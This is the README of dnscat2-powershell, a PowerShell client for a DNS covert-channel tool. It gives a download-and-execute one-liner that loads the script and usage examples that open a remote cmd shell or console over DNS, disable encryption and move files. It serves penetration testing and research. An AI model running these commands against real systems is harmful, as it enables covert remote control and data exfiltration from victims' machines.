- The upload and download functions inside the command session only work consistently with small files. - Please use the original executable client if you require larger file transfers.
dnscat2 is a DNS covert channel tool by @iagox86 (Ron Bowes) which is used to transfer data over DNS requests.
This is a powershell version of the dnscat2 C client.
Click here for a blog post that gives a more detailed breakdown of the purpose of this script, and how to use it.
To use this script, you'll need the ruby dnscat2 server. Make sure to add the
--no-cache option when running the server. This client is incompatible with the server's caching.
First, install the dnscat2 server. Start the server with caching disabled using
--no-cache. The command to start your server should look something like this:
ruby dnscat2.rb --dns="domain=example.com" --no-cache
Next, launch Windows Powershell (version 2.0 or later). You can use this command to load the dnscat2 powershell functions:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')
Start-Dnscat2 is the actual function used as the client. Specifiy the dnscat2 server using
Start a command session, and send DNS requests to 188.8.131.52 on port 53: Start-Dnscat2 -Domain <dnscat2 server> -DNSServer 184.108.40.206 Send a cmd shell, and send DNS requests to the default DNS Server set in Windows: Start-Dnscat2 -Domain <dnscat2 server> -Exec cmd Start a console session. Only use CNAME, MX, and AAAA requests: Start-Dnscat2 -Domain <dnscat2 server> -LookupTypes @("CNAME","MX","AAAA") -Console Do not encrypt the session. Encryption is enabled by default. Start-Dnscat2 -Domain <dnscat2 server> -NoEncryption
Powershell Command Session Commands
The client can handle normal dnscat2 commands, or the powershell version of that command. To use the powershell version of a command, set specific parameters the client will detect (These are commands run from a command session on the server):
Start a new session which simulates a Powershell shell, like ExecPS: exec psh Upload app.exe on the server into a hex string stored in the $app powershell variable: upload app.exe hex:$app Download the byte array stored in the $app powershell variable to app.exe on the server: download bytes:$app app.exe
-Domain <String> The Domain being used by the dnscat2 server. -DNSServer <String> The hostname or IP Address to send DNS queries to. (Default: Set by Windows) -DNSPort <Int32> The port to send DNS queries to. (Default: 53) -Command Start a command session. (Default) -Exec <String> Link the I/O of a process with the Dnscat2 session. -Console Link the I/O of the console with the Dnscat2 session. -ExecPS Simulate a Powershell session and link the IO with the Dnscat2 session. WARNING: Exiting will kill the entire dnscat2 client, not just the session. -PreSharedSecret Set the same secret on the server to authenticate and prevent MITM. -NoEncryption Do not use encryption. -LookupTypes <String> Set an array of lookup types to randomly switch between. Only TXT, MX, CNAME, A, and AAAA records are supported. Default: @(TXT, MX, CNAME) -Delay <Int32> Set a delay between each request, in milliseconds. (Default: 0) -MaxRandomDelay <Int32> Set the max value of a random delay added to the normal delay, in milliseconds. (Default: 0) -MaxPacketSize <Int32> Maximum length of a dnscat2 packet. (Default: 240) -Name <String> The name of your dnscat2 session. (Default: hostname)
ExecPS and 'exec psh'
dnscat2-powershell simulates a powershell session by passing data from the server to Invoke-Expression. Only stdout is returned, and variables are preserved as long as the client is running. Watch out for things that exit powershell like "exit" and "break", because the entire dnscat2-powershell client will exit, not just the ExecPS session.
- db9 on stackoverflow's demonstration of BouncyCastle ECDH.
- FrankSpierings's implementation of Salsa20 and Sha3 in Powershell via C#.
- Rebex Labs stripped down version of the BouncyCastle DLL for ECC.